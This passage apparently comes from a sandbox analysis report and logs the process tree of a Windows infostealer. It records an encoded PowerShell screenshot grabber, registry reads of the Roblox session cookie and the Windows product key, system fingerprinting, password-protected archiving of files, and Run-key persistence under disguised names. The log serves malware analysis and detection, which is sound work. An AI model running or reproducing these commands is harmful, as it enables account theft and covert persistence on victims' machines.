4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="26⤵PID:4904
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=27⤵
- Suspicious behavior: EnumeratesProcesses
PID:1576 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mqzol1ve\mqzol1ve.cmdline"28⤵PID:3584
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2E10.tmp" "c:\Users\Admin\AppData\Local\Temp\mqzol1ve\CSC387C86B1DF4744029A1BF864AB54A5FB.TMP"29⤵PID:5156
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"26⤵PID:1708
-
C:\Windows\system32\tree.comtree /A /F27⤵PID:5564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"26⤵PID:4480
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts27⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"26⤵PID:5760
-
C:\Windows\system32\tree.comtree /A /F27⤵PID:5708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"26⤵PID:392
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts27⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"26⤵PID:5552
-
C:\Windows\system32\tree.comtree /A /F27⤵PID:4056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"26⤵PID:5980
-
C:\Windows\system32\tasklist.exetasklist /FO LIST27⤵
- Enumerates processes with tasklist
PID:5148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"26⤵PID:5872
-
C:\Windows\system32\tree.comtree /A /F27⤵PID:5420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"26⤵PID:5612
-
C:\Windows\system32\tree.comtree /A /F27⤵PID:5796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"26⤵PID:3680
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV127⤵PID:4624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY27⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"26⤵PID:5340
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY27⤵
- Suspicious behavior: EnumeratesProcesses
PID:4288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"26⤵PID:4200
-
C:\Windows\system32\getmac.exegetmac27⤵PID:4740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI16402\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\5I94M.zip" *"26⤵PID:5904
-
C:\Users\Admin\AppData\Local\Temp\_MEI16402\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI16402\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\5I94M.zip" *27⤵
- Executes dropped EXE
PID:3752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"26⤵PID:5380
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption27⤵PID:456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"26⤵PID:5500
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory27⤵PID:6116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"26⤵PID:4872
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid27⤵PID:2332
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"26⤵PID:732
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER27⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"26⤵PID:2544
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV127⤵PID:5512
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name27⤵
- Detects videocard installed
PID:3348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"26⤵PID:1336
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV127⤵PID:5396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault27⤵
- Suspicious behavior: EnumeratesProcesses
PID:4356
-
-
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"24⤵
- Executes dropped EXE
PID:5480
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"24⤵
- Checks computer location settings
- Executes dropped EXE
PID:5484 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1ECE.tmp\1ECF.tmp\1ED0.bat C:\Windows\system32\java.exe"25⤵PID:2384
-
C:\Windows\system32\timeout.exetimeout 126⤵PID:2628
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f26⤵PID:2764
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f26⤵PID:680
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f26⤵PID:5512
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f26⤵PID:5528
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"26⤵
- Executes dropped EXE
PID:5284 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"27⤵
- Executes dropped EXE
PID:4624
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"26⤵
- Executes dropped EXE
PID:5596
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"26⤵
- Checks computer location settings
- Executes dropped EXE
PID:2788 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2621.tmp\2622.tmp\2623.bat C:\Windows\system32\java.exe"27⤵PID:1248
-
C:\Windows\system32\timeout.exetimeout 128⤵
- Delays execution with timeout.exe
PID:1256
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f28⤵
- Adds Run key to start application
PID:2648
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f28⤵
- Adds Run key to start application
PID:3744
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f28⤵PID:5636
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f28⤵PID:376
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"28⤵
- Executes dropped EXE
PID:5704 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"29⤵
- Executes dropped EXE
PID:5660
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"28⤵
- Executes dropped EXE
PID:5688
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"28⤵
- Checks computer location settings
- Executes dropped EXE
PID:5600 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2F58.tmp\2F59.tmp\2F5A.bat C:\Windows\system32\java.exe"29⤵
- Drops file in System32 directory
PID:5804 -
C:\Windows\system32\timeout.exetimeout 130⤵PID:5992
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f30⤵PID:744
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f30⤵PID:5380
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f30⤵
- Adds Run key to start application
PID:2816
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f30⤵PID:4112
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"30⤵
- Executes dropped EXE
PID:5204 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"31⤵
- Executes dropped EXE
PID:5860
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"30⤵
- Executes dropped EXE
PID:2128
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"30⤵
- Checks computer location settings
- Executes dropped EXE
PID:5276 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\362E.tmp\362F.tmp\3630.bat C:\Windows\system32\java.exe"31⤵
- Drops file in System32 directory
PID:4364 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV132⤵PID:5356
-
-
C:\Windows\system32\timeout.exetimeout 132⤵
- Delays execution with timeout.exe
PID:5852
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f32⤵PID:5360
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f32⤵PID:2808
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f32⤵PID:540
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f32⤵PID:5968
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"32⤵
- Executes dropped EXE
PID:5972 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"33⤵PID:3460
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"32⤵PID:400
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"32⤵
- Checks computer location settings
PID:5948 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3E8B.tmp\3E8C.tmp\3E8D.bat C:\Windows\system32\java.exe"33⤵PID:1004
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV134⤵PID:4112
-
-
C:\Windows\system32\timeout.exetimeout 134⤵PID:5788
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f34⤵PID:1276
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f34⤵
- Adds Run key to start application
PID:5912
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f34⤵PID:3920
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f34⤵PID:1300
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"34⤵PID:5672
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"35⤵PID:820
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"34⤵PID:4992
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"34⤵
- Checks computer location settings
PID:528 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\45CE.tmp\45CF.tmp\45D0.bat C:\Windows\system32\java.exe"35⤵
- Drops file in System32 directory
PID:2384 -
C:\Windows\system32\timeout.exetimeout 136⤵
- Delays execution with timeout.exe
PID:5684
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f36⤵PID:4304
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f36⤵
- Adds Run key to start application
PID:5792
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f36⤵PID:5616
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f36⤵
- Adds Run key to start application
PID:4528
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"36⤵PID:5028
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"37⤵PID:3908
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"36⤵PID:5180
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"36⤵
- Checks computer location settings
PID:2012 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4DEC.tmp\4DED.tmp\4DEE.bat C:\Windows\system32\java.exe"37⤵
- Drops file in System32 directory
PID:2816 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV138⤵PID:840
-
-
C:\Windows\system32\timeout.exetimeout 138⤵
- Delays execution with timeout.exe
PID:5872
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f38⤵
- Adds Run key to start application
PID:1136
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f38⤵PID:4972
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f38⤵PID:6032
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f38⤵PID:3048
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"38⤵PID:5564
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"39⤵PID:844
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"38⤵PID:2516
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"38⤵
- Checks computer location settings
PID:5944 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\55BC.tmp\55BD.tmp\55BE.bat C:\Windows\system32\java.exe"39⤵
- Drops file in System32 directory
PID:5008 -
C:\Windows\system32\timeout.exetimeout 140⤵PID:2648
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f40⤵PID:1128
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f40⤵PID:3352
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f40⤵PID:5472
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f40⤵PID:5592
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"40⤵PID:4056
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"41⤵PID:696
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"40⤵PID:5064
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"40⤵
- Checks computer location settings
PID:5596 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5D3E.tmp\5D3F.tmp\5D40.bat C:\Windows\system32\java.exe"41⤵
- Drops file in System32 directory
PID:2124 -
C:\Windows\system32\timeout.exetimeout 142⤵PID:5812
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f42⤵PID:1192
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f42⤵PID:5964
-
-
